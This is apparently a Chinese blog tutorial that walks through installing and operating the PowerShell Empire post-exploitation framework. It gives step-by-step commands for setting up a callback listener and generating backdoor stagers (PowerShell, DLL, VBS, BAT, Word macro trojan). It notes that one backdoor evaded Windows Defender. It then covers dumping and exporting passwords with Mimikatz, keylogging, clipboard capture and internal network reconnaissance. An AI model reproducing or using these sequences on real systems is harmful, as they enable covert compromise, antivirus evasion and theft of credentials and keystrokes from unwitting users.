目录
0x01 前言
Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中
安装建议
虽然现在该项目在GitHub上已经停止维护了,python2.7也已经停止更新了,该工具还是能够使用的,只是安装起来异常麻烦,要一个模块一个模块的安装,而且最好是安装在老版本的Kali上,最新版的Kali虽然看起来花里胡哨的,但是有很多工具因为编译环境的问题,花在解决问题上的时间就不少,极易影响安装进度。本文就是在搞了半天的环境后果断选用Kali2019成功安装。
0x02 安装
Empire下载地址:https://github.com/EmpireProject/Empire.git(因为安装这玩意儿还把Kali的代理软件搞坏了,直接访问该链接下载了复制上去即可),百度的方法大多都是git clone,但是国内的网......
unzip Empire-master.zip
cd Empire-master
cd setup/
./install.sh
最后输入数据库密码,直接回车默认即可
在安装的过程中会报大量的[ImportError: No module named xlutils.copy]类似这样的问题,而且现在很多模块名早已物是人非了,名字要么简化了,要么直接没了,直接使用pip install moudlename安装接口,如果失败就只有手动安装了。
百度对应的模块名,到官网下载后解压,使用python2 setup.py install安装即可。
虽然麻烦一点但相信你迟早会安装完成的,进入Empire安装目录执行./empire启动。
0x03 Empire使用教程
Empire的使用和MSF类似,建立一个Listeners,然后生成 木 马,在目标主机上执行,在Listeners上就会接收到目标主机返回的会话。现在个人感觉使用这个的应该不多了,大多数还是CS或者MSF。
输入help查看命令帮助。
1.Listeners建立监听
使用?查看帮助命令uselistener是使用Empire的监听模块,能使用的有9个监听模块。
使用http模块,需要键入uselistener http, 然后在使用info查看该监听器需要配置的参数。
根据Name字段配置需要的参数,只需要配置Name、Host、Port即可。
set Name jietewang # 设置监听名字
set Host http://192.168.163.118:3333 # 设置主机ip(Empire安装的主机IP)
set Port 3333 # 设置端口
execute # 执行
back # 返回上一层
list # 查看当前激活的监听列表
kill name # 删除该监听
2.生成后门
通过设置监听接受反弹的shell,usestager该命令设置生成木马的模块,multi为通用模块,osx为MacOS的模块,Windows既是WindowsOS的模块。
Powershell反弹命令
如果需要生成利用Powershell反弹shell的命令,在设置完监听以后,输入launchher powershell listenerName来生成powershell代码。
将生成的payload到目标主机执行,即可获得session,此时便会在攻击机上看到Empire已上线了一个名为B3ZHSVPG的主机了。
使用agents命令可以查看已经存在的会话
接收到会话后的常用命令
interact # 连接主机
remove # 删除失效主机
shell command # 执行cmd命令时需要
help agentcmds # 常看经常使用的命令
获取目标主机屏幕截图使用命令sc
2.DLL木马
使用命令:usestager windows/dll
查看配置参数:info
设置监听器:set Listener jietewang
执行:execute
关于DLL木马使用了很多方法均失败了,先放弃吧。也没有搜到详细的介绍文章,有一个大兄弟给了一个运行DLL文件的方法,执行成功了但是没有上线。
如何运行dll文件_龙傲天的博客-CSDN博客_.dll文件怎么执行直接拷贝该文件到系统目录里: 1、Windows 95/98/Me系统,将dao360.dll复制到C:\Windows\System目录下。 2、Windows NT/2000系统,将dao360.dll复制到C:\WINNT\System32目录下。 3、Windows XP/WIN7/Vista系统,将dao360.dll复制到C:\Windows\System32目https://blog.csdn.net/oYuHuaChen/article/details/54612998直接拷贝该文件到系统目录里:
1、Windows 95/98/Me系统,将dao360.dll复制到C:\Windows\System目录下。
2、Windows NT/2000系统,将dao360.dll复制到C:\WINNT\System32目录下。
3、Windows XP/WIN7/Vista系统,将dao360.dll复制到C:\Windows\System32目录下。
4、如果您的系统是64位的请将文件复制到C:\Windows\SysWOW64目录
开始-运行-输入regsvr32 dao360.dll
3.生成VBS脚本后门
使用命令:usestager windows/launcher_vbs
查看配置参数:info
设置监听器:set Listener jietewang
执行:execute
生成的后门会在目录/tmp/下,将其上传到目标主机执行即可上线。
4.生成bat脚本后门
使用命令:usestager windows/launcher_bat
查看配置参数:info
设置监听器:set Listener jietewang
执行:execute
生成的后门会在目录/tmp/下,将其上传到目标主机执行即可上线。bat文件生成后物理机上的Windows Defender是并未报毒查杀的,这算是直接免杀了吗?之前生成的后门是无一幸免被其报毒查杀要一一加白才行。
5.Macro 木马
使用命令:usestager windows/macro
查看配置参数:info
设置监听器:set Listener jietewang
执行:execute
使用宏木马时,需要将生成的代码添加到Office文件中,才能完成上线,当用户触发word文件时Empire会接收到会话。如何添加到word中请参考文章【3.3.2 MS Office Macro】:CobaltStrike 4.1中文版的安装使用_Jietewang的博客-CSDN博客_cobaltstrike汉化1. CobaltStrike简介CobaltStrike是一款后渗透神器,有个故事是这么说的自从用了CobaltStrike神器后,妈妈再也不用担心我搞渗透了。专业人士亲切的称它为CS,于其说它是一个工具不如说它是一个集成的平台...https://blog.csdn.net/Jietewang/article/details/111033558
6.其他操作
使用mimikatz抓取主机密码
creds # 自动过滤和整理用户密码
creds export /root/pass.csv # 将密码保存到本地
0x04 使用Empire进行信息收集
利用Empire除了可以进行上文提到的常规命令执行信息收集和屏幕截图意外,该工具还提供了很多模块用于信息收集,使我们能从更加专业和便捷的角度收集内网与主机相关的更多信息。
1.键盘记录
使用模块:usemodule powershell/collection/keylogger
设置agent对象:set Agent WRPXH9A3
执行:execute
键盘记录结果保存在目录 Empire/downloads/agent名/keystrokes.txt,但是不会记录中文、空格,删除的内容都是可以记录的,如果要持续进行键盘记录,可以把当前监控模块置于后台,输入jobs即可显示当前在后台的记录,如果要停止记录,可以使用jobs kill JOB_name命令。
2.剪贴板记录
使用模块:usemodule powershell/collection/clipboard_monitor
设置agent对象:set Agent WRPXH9A3
执行:execute
3.查找共享
使用模块:usemodule situational_awareness/network/powerview/share_finder
执行:execute
4.目标主机信息收集
(Empire: W36U52LP) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute
该模块能收集到主机的很多信息,包含主机名、活动目录组成员、最后5个被打开的文件、“有趣的文件”、系统信息、安装的软件、进程、可用的共享、网卡信息、防火墙规则等等。因为内容较多流量狠大,个人感觉不是很安全。
usemodule situational_awareness/host/computerdetails*
可以使用上述模块收集主机日志信息
5.arp扫描
(Empire: W36U52LP) > usemodule situational_awareness/network/arpscan
(Empire: powershell/situational_awareness/network/arpscan) > set Range 192.168.163.0-192.168.163.254
(Empire: powershell/situational_awareness/network/arpscan) > execute
6.其他域相关
usemodule situational_awareness/network/powerview/user_hunter
usemodule situational_awareness/network/powerview/find_localadmin_access # 本地管理组usemodule situational_awareness/network/powerview/get_domain_controller # 获取域控
usemodule situational_awareness/network/reverse_dns # DNS信息获取usemodule situational_awareness/host/dnsserver # 查询当前DNS服务器